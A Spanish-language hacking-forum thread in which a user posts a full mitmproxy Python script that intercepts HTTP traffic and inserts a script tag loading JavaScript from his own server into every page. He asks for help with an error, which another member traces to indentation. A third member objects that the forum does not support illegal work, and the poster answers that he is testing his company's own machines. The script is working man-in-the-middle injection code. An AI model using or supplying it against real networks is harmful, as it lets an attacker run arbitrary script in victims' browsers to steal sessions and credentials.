Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Hacking => Mensaje iniciado por: p4tria en 24 Octubre 2015, 12:49 PM

Título: inyectar código MITM a HTTP AYUDA
Publicado por: p4tria en 24 Octubre 2015, 12:49 PM
Buenas,

estoy tratando de hacer una POC que me he encontrado, y no soy capaz de inyectar el código que quiero a ver si me podéis echar un cable.

Estoy usando

KALI 2
--------
mitmproxy

y un script que me he encontrado por ahí para inyectar código JS.

# Usage: mitmdump -s "js_injector.py src"
# (this script works best with --anticache)
from bs4 import BeautifulSoup
from libmproxy.protocol.http import decoded

# On start of proxy server ask for src as an argument
def start(context, argv):
   if len(argv) != 2:
       raise ValueError('Usage: -s "js_injector.py src"')
   context.src_url = argv[1]


def response(context, flow):
   if flow.request.host in context.src_url:
       return # Make sure JS isn't injected to itself
   with decoded(flow.response):  # Remove content encoding (gzip, ...)
       html = BeautifulSoup(flow.response.content)
       if html.body:
           script = html.new_tag(
               "script",
               src=context.src_url,
               type='application/javascript')
           html.body.insert(0, script)
           flow.response.content = str(html)
           context.log("Script injected.")

Hago la redirección de tráfico HTTP y HTTPS al 8080 de mitmproxy; y el problema viene cuando trato de hacer la inyección llamando al script de java que subo a mi
python -m SimpleHTTPServer 80

(http://i.imgur.com/ValRmEV.png?1)

alguna idea de este error?



Título: Re: inyectar código MITM a HTTP AYUDA
Publicado por: engel lex en 24 Octubre 2015, 16:17 PM
es un problema de sangría... python es sensible con los espacios a la izquierda, distningue espacios de tabulaciones y la cantidad de los mismos
Título: Re: inyectar código MITM a HTTP AYUDA
Publicado por: k0pkill3r en 24 Octubre 2015, 20:10 PM
el foro no apoya a ilegales......o no éticos

paso de buscar citas......
Título: Re: inyectar código MITM a HTTP AYUDA
Publicado por: p4tria en 28 Octubre 2015, 21:11 PM
Cita de: k0pkill3r en 24 Octubre 2015, 20:10 PM
el foro no apoya a ilegales......o no éticos

paso de buscar citas......

como no me conoces de nada entiendo que tienes razones suficientes (por mi nick o no sé por qué) para decirme que realizo acciones ilegales/no éticos

no sé qué tiene de ilegal realizar POC's en los equipos de mi propia empresa, para poner tonterías mejor no escribas; o si lo haces no prejuzgues

Cita de: engel lex en 24 Octubre 2015, 16:17 PM
es un problema de sangría... python es sensible con los espacios a la izquierda, distningue espacios de tabulaciones y la cantidad de los mismos

muchas gracias ya está solucionado  ;-)
Sólo texto | Texto con Imágenes